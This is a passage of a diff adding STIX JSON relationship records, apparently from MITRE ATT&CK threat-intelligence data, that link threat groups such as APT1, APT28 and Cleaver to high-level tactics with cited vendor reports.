"intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--9108e212-1c94-4f8d-be76-1aad9b4c86a4", + "type": "relationship", + "modified": "2019-03-22T20:00:23.846Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--7bd3d2ba-f114-4835-97b6-1c3e2208d3f3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41" + }, + { + "id": "relationship--94daf955-fb3e-4f13-af60-0e3ffa185be0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe", + "relationship_type": "related-to", + "target_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c" + }, + { + "id": "relationship--2b0ec032-eaca-4f0c-be55-39471f0f2bf5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used publicly available privilege escalation tools.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "type": "relationship", + "modified": "2019-08-20T13:08:13.337Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--9a1f729c-72a9-4735-9d48-ecb54ea018a9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6", + "relationship_type": "related-to", + "target_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402" + }, + { + "id": "relationship--bc165934-7ef6-4aed-a0d7-81d3372589f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b", + "relationship_type": "related-to", + "target_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077" + }, + { + "id": "relationship--22d4f32c-63c1-400f-8e2c-10e4a200d133", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407", + "relationship_type": "related-to", + "target_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84" + }, + { + "id": "relationship--9ad9966d-4a8d-4b15-b503-c5d27104fcdd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c" + }, + { + "id": "relationship--545cd36e-572e-413d-82b9-db65788791f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT17](https://attack.mitre.org/groups/G0025) posted in forum threads and created profile pages in Microsoft TechNet.(Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "relationship_type": "uses", + "target_ref": "attack-pattern--9108e212-1c94-4f8d-be76-1aad9b4c86a4", + "type": "relationship", + "modified": "2019-03-22T14:21:19.554Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--715a66b4-7925-40b4-868a-e47aba879f8b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41" + }, + { + "id": "relationship--db4dfa09-7f19-437a-9d79-15f2dc8ba0da", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39", + "relationship_type": "related-to", + "target_ref": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6" + }, + { + "id": "relationship--0e52753e-0a02-4bec-88f9-f8ee21b46bae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "relationship_type": "related-to", + "target_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b" + }, + { + "id": "relationship--be031f72-737b-4afd-b2c1-c565f5ab7369", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a", + "relationship_type": "related-to", + "target_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b" + }, + { + "id": "relationship--2bf984b5-1a48-4d9a-a4f2-e97801254b84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "relationship_type": "related-to", + "target_ref": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11" + }, + { + "id": "relationship--28815a00-1cf4-4fbc-9039-306a9542c7fd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077", + "relationship_type": "related-to", + "target_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b" + }, + { + "id": "relationship--41be9f31-9d2b-44b8-a7dc-31f8c4519751", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6", + "relationship_type": "related-to", + "target_ref": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39" + }, + { + "id": "relationship--9c44b2ec-70b0-4f5c-800e-426477330658", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c", + "relationship_type": "related-to", + "target_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff" + }, + { + "id": "relationship--4eb0e01c-85ae-466a-a8ff-0cf7891c5ab2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT16](https://attack.mitre.org/groups/G0023) spearphished journalists, apparently targeting those interested in contact information for DPP members or politicians.(Citation: FireEye EPS Awakens Part 2)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "source_name": "FireEye EPS Awakens Part 2" + } + ], + "source_ref": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "relationship_type": "uses", + "target_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549", + "type": "relationship", + "modified": "2019-03-22T14:20:45.708Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--d5bd7a33-a249-46e5-bb19-a498eba42bdb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc" + }, + { + "id": "relationship--3d781e9a-d3f8-4e9f-bb23-ba6c2ff22267", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11", + "relationship_type": "related-to", + "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6" + }, + { + "id": "relationship--9524754d-7743-47b3-8395-3cbfb633c020", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549", + "relationship_type": "related-to", + "target_ref": "attack-pattern--73e7d7d5-1782-4cd0-a4d7-00c7ec051c2a" + }, + { + "id": "relationship--689ebb39-52f4-4b2f-8678-72cfed67cb9f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407" + }, + { + "id": "relationship--b180dee5-0d48-448f-94b9-4997f0c584d5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc" + }, + { + "id": "relationship--7aaa32b6-73f3-4b6e-98ae-da16976e6003", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c", + "relationship_type": "related-to", + "target_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73" + }, + { + "id": "relationship--9c87b627-de61-42da-a658-7bdb33358754", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT17](https://attack.mitre.org/groups/G0025) obfuscated infrastructure using a multi-layered malware beaconing approach. (Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "relationship_type": "uses", + "target_ref": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39", + "type": "relationship", + "modified": "2019-03-22T14:21:19.564Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--36990d75-9fbd-43f0-9966-ae58f0388e1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41", + "relationship_type": "related-to", + "target_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc" + }, + { + "id": "relationship--2dbdcf5e-af75-4f92-b4ad-942a06aab259", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc" + }, + { + "id": "relationship--87239038-7693-49b3-b595-b828cc2be1ba", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33", + "relationship_type": "related-to", + "target_ref": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d" + }, + { + "id": "relationship--709bb5af-c484-48f2-bb19-bd7630e42e2d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT28](https://attack.mitre.org/groups/G0007) reused the SOURFACE downloader as the payload of a lure document.(Citation: FireEye APT28)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + } + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "relationship_type": "uses", + "target_ref": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "type": "relationship", + "modified": "2019-09-09T17:44:35.673Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--3d65fc7e-87a5-4113-bd9c-09453fba4d1e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT28](https://attack.mitre.org/groups/G0007) registered domains imitating NATO, OSCE security websites, Caucasus information resources and other organizations.(Citation: FireEye APT28) (Citation: US District Court Indictment GRU Oct 2018)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." + } + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "relationship_type": "uses", + "target_ref": "attack-pattern--45242287-2964-4a3e-9373-159fad4d8195", + "type": "relationship", + "modified": "2020-10-01T18:55:39.213Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--d26a1746-b577-4a89-be5e-c49611e8c65a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) fake personas included profile photos, details, and network connections.(Citation: Dell Threat Group 2889)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.", + "source_name": "Dell Threat Group 2889" + } + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201", + "type": "relationship", + "modified": "2019-03-22T20:00:23.896Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--66e4da4a-6eb6-46e0-9baf-74059f341b4a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5" + }, + { + "id": "relationship--51c20b46-16cc-4b58-80d7-89d48b14b064", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5", + "relationship_type": "related-to", + "target_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1" + }, + { + "id": "relationship--432c700b-4bf3-4824-a530-a6e86882c4b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73", + "relationship_type": "related-to", + "target_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff" + }, + { + "id": "relationship--b09b41c4-670f-4f00-b8d5-a8c6a2dcfcfb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.(Citation: Cylance Cleaver)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + } + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234", + "type": "relationship", + "modified": "2019-03-22T20:00:23.891Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--ad510f42-e745-42d0-8b54-4bf7a2f3cf34", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae", + "relationship_type": "related-to", + "target_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1" + }, + { + "id": "relationship--39db1df8-f786-480c-9faf-5b870de2250b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used third party email services in the registration of whois records.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "type": "relationship", + "modified": "2019-08-20T13:08:13.437Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "id": "relationship--0e7905fd-77c8-43cb-b499-7d6e37fefbeb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT1](https://attack.mitre.org/groups/G0006) used dynamic DNS to register hundreds of FQDNs.(Citation: Mandiant APT1)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "relationship_type": "uses", + "target_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe", + "type": "relationship", + "modified": "2019-08-20T13:08:13.554Z", + "created": "2017-12-14T16:46:06.044Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983", + "target_ref": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59", + "relationship_type": "related-to", + "id": "relationship--1aafdefb-304e-4998-87cc-81aad295f721", + "type": "relationship", + "modified": "2019-02-19T18:56:56.136Z", + "created": "2019-02-19T18:56:56.136Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59", + "target_ref": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983", + "relationship_type": "related-to", + "id": "relationship--83379e43-4bc5-4c49-b0b3-f41161e8e96d", + "type": "relationship", + "modified": "2019-02-19T18:56:56.770Z", + "created": "2019-02-19T18:56:56.770Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6", + "external_references": [ + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + } + ], + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used Virtual Private Server (VPS) infrastructure.(Citation: FireEye TRITON 2019)", + "relationship_type": "uses", + "id": "relationship--2d95ed6f-52e7-4708-af15-9a6c08390454", + "type": "relationship", + "modified": "2019-04-29T18:59:16.595Z", + "created": "2019-04-24T19:45:44.205Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c", + "external_references": [ + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + } + ], + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used dynamic DNS.(Citation: FireEye TRITON 2019)", + "relationship_type": "uses", + "id": "relationship--21842707-0f15-43bf-bc42-2bceadf2cfa2", + "type": "relationship", + "modified": "2019-04-29T18:59:16.596Z", + "created": "2019-04-24T19:45:44.212Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "target_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077", + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "description": "[APT1](https://attack.mitre.org/groups/G0006) compromised a vast set of 3rd party victim hop points as part of their network infrastructure. For example, [APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points. Mandiant considers them to be 